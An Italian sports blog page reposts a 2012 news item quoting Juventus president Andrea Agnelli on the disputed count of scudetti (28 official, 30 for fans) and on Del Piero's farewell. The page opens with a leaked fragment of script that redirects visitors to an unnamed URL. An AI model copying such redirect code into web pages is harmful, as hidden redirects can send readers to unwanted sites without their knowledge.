location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Agnelli conta gli scudetti "28 ufficiali, 30 per ogni juventino"

Ads 468x60px

Random Post

Template Updates

mercoledì 23 maggio 2012

Agnelli conta gli scudetti "28 ufficiali, 30 per ogni juventino"


Andrea Agnelli, 36 anni, presidente della Juventus. LaPresse
Andrea Agnelli, 36 anni, presidente della Juventus. LaPresse
"Per i documenti ufficiali è il 28esimo. Ma per ogni singolo juventino nel mondo è il 30esimo. È una questione molto delicata. Noi viviamo con i sentimenti, quando dico che uno dei privilegi nel gestire la Juventus sta nel fatto che si gestiscono anche i sogni e le emozioni della gente. Nelle nostre emozioni e nei nostri sentimenti ne abbiamo 30". Così il presidente della Juventus Andrea Agnelli, in un'intervista rilasciata ieri a Londra alla Cnn e rilanciata oggi dalla stessa emittente, ha risposto alla domanda su quale fosse il numero reale degli scudetti della storia della Juventus.
Andrea Agnelli con Antonio Conte. Ansa
Andrea Agnelli con Antonio Conte. Ansa
SU DEL PIERO — Il presidente bianconero ha anche parlato di Del Piero e della fine della sua
carriera alla Juventus. "Penso che Alessandro, come ho già detto molte volte, rappresenterà per sempre la Juventus. Ho sempre ricordato Platini e Boniperti pensando alla Serie A, come dei giocatori della Juventus per sempre. Alessandro è stato il nostro capitano per dieci anni e con che finale: ha lasciato sollevando un trofeo... Che storia incredibile. Ha avuto una standing-ovation di 15 minuti quando ha lasciato lo stadio, e penso che dobbiamo essergli sempre grati perchè ci ha dato tante gioie".

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text